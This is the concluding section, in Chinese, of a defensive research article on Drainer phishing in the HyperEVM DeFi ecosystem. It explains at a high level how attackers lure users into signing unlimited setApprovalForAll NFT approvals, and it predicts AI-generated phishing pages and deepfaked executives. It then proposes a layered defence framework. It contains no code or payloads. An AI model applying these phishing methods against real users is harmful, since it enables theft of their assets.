第一,HyperEVM 二层网络 NFT 绑定流动性池的业务模式放大 Drainer 钓鱼攻击危害,攻击者无需攻破协议底层漏洞,仅依靠诱导用户签署 setApprovalForAll 无限 NFT 授权,即可两分钟内全额提取用户流动性资产;该攻击依托标准化 DaaS 套件实现产业化批量作案,攻击成本极低、传播速度快、隐蔽性远超传统网页钓鱼,是当前二层 EVM DeFi 生态首要安全威胁。
第二,Hyperliquid 底层公链、HyperEVM 二层、第三方 HyperSwap 应用三层独立架构存在权责割裂、安全情报孤岛、风险处置主体缺失等结构性短板,是钓鱼诱饵长期传播、受害用户无法及时止损维权的核心诱因,通用单层 Web3 防御方案无法适配该分层生态安全需求。
第三,现有防护体系存在多重失效短板:社交平台仿冒账号识别滞后、Web3 钱包 NFT 授权风险提示不足、二层 EVM 链上实时监测覆盖薄弱、跨机构恶意地址情报无法互通,静态黑名单、传统网页钓鱼识别手段难以拦截动态 Drainer 攻击。
第四,本文构建的四维闭环防御框架可完整覆盖 Drainer 钓鱼事前、事中、事后全风险周期,分别从流量拦截、交易预警、资金冻结、长效协同运营四个维度落地防护措施,统筹用户、项目方、链上服务商、社交平台四方责任,适配 Hyperliquid 分层二层 EVM 生态,具备完整工程落地可行性,可有效降低同类授权钓鱼攻击的受害规模与资产损失金额。
6.2 研究局限与未来威胁演化、研究方向
本文研究基于 Coinspot 公开新闻披露信息、HyperEVM 链上公开交易数据、开源 Drainer 套件样本完成分析,受限于公开数据边界,无法获取攻击者 C2 后端完整运营数据、团伙批量投放钓鱼站点运维机制,未能完整剖析 DaaS 地下产业链上游生产、分销、分赃全流程,后续可依托更多批量钓鱼实战样本完善产业链上游研究。
从威胁演化趋势判断,未来 HyperEVM 同类二层链 Drainer 钓鱼攻击将呈现两大迭代方向:一是 AI 生成动态钓鱼前端,大模型实时改写页面文案、域名字符混淆规则、交易诱导话术,规避社交平台、浏览器静态钓鱼检测;二是混合式钓鱼链路,先通过 AI 生成高管伪造音视频开展社交鱼叉钓鱼,获取用户信任后推送空投钓鱼链接,进一步提升授权签名成功率。
对应防御技术层面,后续可聚焦两大深化研究方向:一是基于大模型的钓鱼页面动态语义识别引擎,自动解析空投诱导话术、无限授权隐藏逻辑,实现钓鱼站点实时动态拦截;二是二层 EVM 定制化合约授权安全标准,设计绑定业务场景的限时、限额 NFT 授权机制,从底层标准消除永久无限授权带来的资产被盗风险。Hyperliquid 等分层 DeFi 生态需同步完善跨主体安全协同机制,打通情报共享、风险处置、用户维权通道,持续迭代钱包、链上监测、社交风控多层防护能力,构建适配二层 EVM NFT 流动性业务场景的 Web3 安全防护体系。
编辑:芦笛(公共互联网反网络钓鱼工作组)